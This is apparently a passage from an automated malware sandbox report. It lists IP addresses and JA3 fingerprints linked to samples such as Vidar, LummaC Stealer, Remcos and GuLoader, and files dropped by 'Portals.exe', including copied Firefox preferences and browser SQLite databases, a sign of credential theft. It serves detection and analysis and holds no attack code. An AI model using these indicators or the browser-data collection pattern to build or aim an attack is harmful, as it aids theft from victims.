                                                                                                                                                                                                    • 88.198.246.242
                                                                                                                                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                                                                                    • 88.198.246.242
                                                                                                                                                                                                    http://abhishek9589.github.io/netflixclone/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                    • 78.46.22.25
                                                                                                                                                                                                    http://copyright-accountscenter.github.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                    • 116.202.166.112
                                                                                                                                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                                                                                    • 88.198.246.242
                                                                                                                                                                                                    HETZNER-ASDEngbtiladkrthgad.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 78.47.63.132
                                                                                                                                                                                                    AAHiVVNIKQESryT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                    • 144.76.229.203
                                                                                                                                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                                                                                    • 88.198.246.242
                                                                                                                                                                                                    uy2g7z.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 195.201.57.90
                                                                                                                                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                                                                                    • 88.198.246.242
                                                                                                                                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                                                                                    • 88.198.246.242
                                                                                                                                                                                                    http://abhishek9589.github.io/netflixclone/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                    • 78.46.22.25
                                                                                                                                                                                                    http://copyright-accountscenter.github.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                    • 116.202.166.112
                                                                                                                                                                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                                                                                                                                                                    • 88.198.246.242
                                                                                                                                                                                                    AKAMAI-ASN1EUPDFizer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 2.22.242.11
                                                                                                                                                                                                    https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071aGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 23.43.60.131
                                                                                                                                                                                                    https://digimobil-recrgar.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 2.19.96.146
                                                                                                                                                                                                    FW_ Remittance Address.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 88.221.110.227
                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    • 23.197.127.21
                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    • 23.197.127.21
                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    • 23.197.127.21
                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                    • 23.197.127.21
                                                                                                                                                                                                    http://app.plangrid.com/projects/bcb97291-5564-5612-9970-d1b139dcb62d/staple/b1fc2804-67d4-470e-9780-d2d4344b3b93Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 2.19.96.120
                                                                                                                                                                                                    Peo Retention Memo Reff No2.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 172.235.37.241

                                                                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                    28a2c9bd18a11de089ef85a160da29e4https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071aGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 204.79.197.222
                                                                                                                                                                                                    https://ctrk.klclick3.com/l/01JP5VPSP6JS7E5VAEC1KGWEB7_2Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 204.79.197.222
                                                                                                                                                                                                    https://tedmino.shop:443/Nordonee_-_Karma.mp3Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 204.79.197.222
                                                                                                                                                                                                    https://auth.microsites.m-atelier.cz/redir?url=https://telegra.ph/Charlotte-Reeves-03-13&data=05%7C02%7Cteat@test.com%7Cf85134ec55e24fa0741708dd623d50ea%7C22def1f7e945453d836bda7282c42443%7C0%7C0%7C638774737677482831%7CUnknown%7CTWFpbGZsb3d8eyJFbXB0eU1hcGkiOnRydWUsIlYiOiIwLjAuMDAwMCIsIlAiOiJXaW4zMiIsIkFOIjoiTWFpbCIsIldUIjoyfQ==%7C0%7C%7C%7C&sdata=AFWlQKGCYsB3szoYr99UdtJsHEuv5b0KPmvHih+dvhk=&reserved=0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 204.79.197.222
                                                                                                                                                                                                    b.ps1Get hashmaliciousXWormBrowse
                                                                                                                                                                                                    • 204.79.197.222
                                                                                                                                                                                                    https://zcmp-semi.maillist-manage.jp/click/11ed2c6aa12966a/11ed2c6aa12ae03Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 204.79.197.222
                                                                                                                                                                                                    demo.bat1.batGet hashmaliciousBatch Injector, Strela StealerBrowse
                                                                                                                                                                                                    • 204.79.197.222
                                                                                                                                                                                                    DropboxInstaller.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 204.79.197.222
                                                                                                                                                                                                    DropboxInstaller.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 204.79.197.222
                                                                                                                                                                                                    ngbtiladkrthgad.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 204.79.197.222
                                                                                                                                                                                                    37f463bf4616ecd445d4a1937da06e19test.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 94.130.189.58
                                                                                                                                                                                                    • 23.197.127.21
                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                    file.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                    • 94.130.189.58
                                                                                                                                                                                                    • 23.197.127.21
                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                    DropboxInstaller.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 94.130.189.58
                                                                                                                                                                                                    • 23.197.127.21
                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                    faktura_FV2025020660849.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 94.130.189.58
                                                                                                                                                                                                    • 23.197.127.21
                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                    ngbtiladkrthgad.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                    • 94.130.189.58
                                                                                                                                                                                                    • 23.197.127.21
                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                    Bina Tegas Sdn Bhd Voucher Receipts.exe.bin.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                                    • 94.130.189.58
                                                                                                                                                                                                    • 23.197.127.21
                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                    NDQ211216GM08.exe.bin.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                    • 94.130.189.58
                                                                                                                                                                                                    • 23.197.127.21
                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                    PO-USH3gS.pdf.pif.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                                                    • 94.130.189.58
                                                                                                                                                                                                    • 23.197.127.21
                                                                                                                                                                                                    • 149.154.167.99
                                                                                                                                                                                                    IPt9U27NoX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                    • 94.130.189.58
                                                                                                                                                                                                    • 23.197.127.21
                                                                                                                                                                                                    • 149.154.167.99

                                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                                    No context

                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Portals.exe_f411adae77749b33a46592f0ef3e523e429446d0_fc381590_fe84d125-4bdf-4b7f-a9d7-aef8ff40fdbe\Report.wer

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):65536
                                                                                                                                                                                                    Entropy (8bit):0.8594340382209428
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:2iMFJztD1dVsqgtojTOAqyS3QXIDcQlc6VcEdcw31+BHUHZ0ownOgHkEwH3dEFWu:i/tDfVsvA0LR3kaWSzuiF6Z24IO88
                                                                                                                                                                                                    MD5:F5DEEAD971B47172DF6CD840C88E7DD7
                                                                                                                                                                                                    SHA1:E95798A7277275758986AC6C0554857F2B35C48D
                                                                                                                                                                                                    SHA-256:66F5CD07051AE10DA22EE245DF085951197A971A6B063DE8801056B79CEBF3F4
                                                                                                                                                                                                    SHA-512:C1AF3DB11E11E016BC34C3B8376B5B05D70B9CF5D11BBDEDF7CAF50E03677FBFE0CE5C8D85342CBF31F397234654EB88D3B9E9A05DFFE952D65B3E1B22F32D7C
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.3.5.8.9.1.6.9.4.2.0.7.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.3.5.8.9.1.7.5.3.5.8.2.2.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.e.8.4.d.1.2.5.-.4.b.d.f.-.4.b.7.f.-.a.9.d.7.-.a.e.f.8.f.f.4.0.f.d.b.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.3.2.b.b.9.4.e.-.9.8.6.8.-.4.e.b.f.-.a.e.d.1.-.0.e.b.f.3.9.4.b.b.d.c.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.o.r.t.a.l.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.r.t.a.l.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.2.8.-.0.0.0.1.-.0.0.1.8.-.4.8.c.0.-.7.6.9.f.3.9.9.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.d.c.7.a.7.7.b.0.8.0.2.3.d.f.f.4.1.3.b.c.4.e.a.5.1.a.2.5.5.6.3.0.0.0.0.0.0.0.0.!.0.0.0.0.2.6.b.2.d.2.e.d.9.4.b.e.a.4.7.7.e.8.2.f.1.d.f.e.4.9.0.a.f.f.2.5.9.8.2.4.a.c.5.d.!.P.o.r.

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER4DB2.tmp.dmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Thu Mar 13 17:01:57 2025, 0x1205a4 type
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):152703
                                                                                                                                                                                                    Entropy (8bit):3.7414726549992943
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:+sPJjvArdRNzRCDwtTWp9TBy/uBojRypN4uE2aOLsgWLTgLH:+fN0aCvQRU4uEqYLTgL
                                                                                                                                                                                                    MD5:272241B9CE4EB10B278F7DD4F3EBC288
                                                                                                                                                                                                    SHA1:BE06341AE3955DF951EA03408752950739302CE8
                                                                                                                                                                                                    SHA-256:9EDB6E603B33B0D528ACE585922775C9B142DCEF36A482C195E2208D4AE8EB28
                                                                                                                                                                                                    SHA-512:1AC08BC2FE0FC18DC790F0DC39FD67F126E00D55D84DECAF1B31AE2A4B47DB9C7D5F95955318BFE7A7DB1DFCD4F83B9481AFD7351F9DD1F6B4104B55B63293F5
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:MDMP..a..... ..........g....................................$................-..........`.......8...........T...........P.../5......................................................................................................eJ..............GenuineIntel............T.......(......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER4EAD.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):8380
                                                                                                                                                                                                    Entropy (8bit):3.6908631690659184
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:R6l7wVeJp366n6Y6wSU0vgmf7VJSprF89bjFsfNBm:R6lXJZ6K6YdSU0vgmf7VJljefi
                                                                                                                                                                                                    MD5:98BC38C235E86E6C1F2C3455E069E423
                                                                                                                                                                                                    SHA1:5FB6A5596E42D1BA516A583D759FD1D2E0548126
                                                                                                                                                                                                    SHA-256:40A25402955DB234508CC3513F011CD883417293570DC68D640CE7F38D1CE5F6
                                                                                                                                                                                                    SHA-512:385A2CC19FACD085E1D0977EDB5E5A973B5B51A8D0CCA0474E103869414EFA79ED044859816C9DC4163B0246D3E90C776A48113017D906F0316ADA776D69BD25
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.9.7.6.<./.P.i.

                                                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WER4F3B.tmp.xml

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4735
                                                                                                                                                                                                    Entropy (8bit):4.438898401379441
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:cvIwWl8zsEJg77aI93sWpW8VYaoYm8M4JwJrdxPcf6F7L+q8vArdxPcf2Z2Nb5Bc:uIjfCI7FF7VhFJwufcLK1fOMb5Bmd
                                                                                                                                                                                                    MD5:1BEE16AD392ED78107531FD5618843CB
                                                                                                                                                                                                    SHA1:ABAC7D85F098E7582D48B629E92AC47D28896207
                                                                                                                                                                                                    SHA-256:BD42DA5C411EA125C90D535B8C91DB597C97E2982996842BB143F28082FFE8AB
                                                                                                                                                                                                    SHA-512:007A6C14CA5D26F1CC6A90F1DDB45A475D4A3BB8FC781495C37FA33423E31C2CCA043ED8BABFDADC507C5BC024B79DF03042384EB2EDA60565B5AC720003B10A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="759364" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                    C:\ProgramData\i58ym\00z58g4wt

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):49152
                                                                                                                                                                                                    Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\ProgramData\i58ym\ct26fk

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):9571
                                                                                                                                                                                                    Entropy (8bit):5.536643647658967
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
                                                                                                                                                                                                    MD5:5D8E5D85E880FB2D153275FCBE9DA6E5
                                                                                                                                                                                                    SHA1:72332A8A92B77A8B1E3AA00893D73FC2704B0D13
                                                                                                                                                                                                    SHA-256:50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
                                                                                                                                                                                                    SHA-512:57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                    C:\ProgramData\i58ym\d2vasr

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3046000, file counter 6, database pages 41, 1st free page 29, free pages 1, cookie 0x25, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):196608
                                                                                                                                                                                                    Entropy (8bit):0.4792253015780342
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:xWpdkG7xQ+ALqL/uejzH+bF+UIYysX0lj/twfLyl0e9S8E:ApdkG77IqL/tH+bF+UI3i67Kylj9
                                                                                                                                                                                                    MD5:33642526D21BAF34FB5D5AAF11B3FB91
                                                                                                                                                                                                    SHA1:A64B4A7605D8B449C085474A3484921975EF6C14
                                                                                                                                                                                                    SHA-256:3ED06184837C7FF625C54589CA2037F127E0525E3541DE8960A9D5503625862B
                                                                                                                                                                                                    SHA-512:A013359FCBAC1005653793D3FF6398E32746E2F6FFCDA26AA3C9EB96279F7A2E989E05B5B8D2510EAF5F93DDD6281A71773DA81C472FCC71AD74315353948782
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:SQLite format 3......@ .......)...........%......................................................zp....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\ProgramData\i58ym\iekxl6

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3046000, page size 2048, file counter 6, database pages 68, cookie 0x4a, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):139264
                                                                                                                                                                                                    Entropy (8bit):1.1366509594298093
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:+lsfoVZkNi61n1ulH5eJpX6Nq4wOVuaaDPqfPk:+lsfoQx1n1ulH5683wOVuaaDPqfM
                                                                                                                                                                                                    MD5:C5CFBCA422AD1353E7116A02424C59FD
                                                                                                                                                                                                    SHA1:38F032839FC5E1F890FAA636390A3CC9556AD350
                                                                                                                                                                                                    SHA-256:F0BFA28378F9311F7EED68314B9476296522994570F3C7B4567AB71857CAC546
                                                                                                                                                                                                    SHA-512:94463562E57B9D42995A55C24E403E6DA2EFD56C0C8EB0DAAF9C5D6D2BC85981717A2D89E92E8F492A409F1BFE1406BA5F1B559AC3457CB4353D227D1954C84B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:SQLite format 3......@ .......D...........J......................................................zp...........<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\ProgramData\i58ym\noh47g

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):98304
                                                                                                                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\ProgramData\i58ym\ophdt0

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):126976
                                                                                                                                                                                                    Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                    MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                    SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                    SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                    SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\ProgramData\i58ym\phvai5

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):114688
                                                                                                                                                                                                    Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\ProgramData\i58ym\qqi5xl

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Portals.exe
                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):294912
                                                                                                                                                                                                    Entropy (8bit):0.08436842005578409
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vIn:51zkVmvQhyn+Zoz67n
                                                                                                                                                                                                    MD5:2CD2840E30F477F23438B7C9D031FC08
                                                                                                                                                                                                    SHA1:03D5410A814B298B068D62ACDF493B2A49370518
                                                                                                                                                                                                    SHA-256:49F56AAA16086F2A9DB340CC9A6E8139E076765C1BFED18B1725CC3B395DC28D
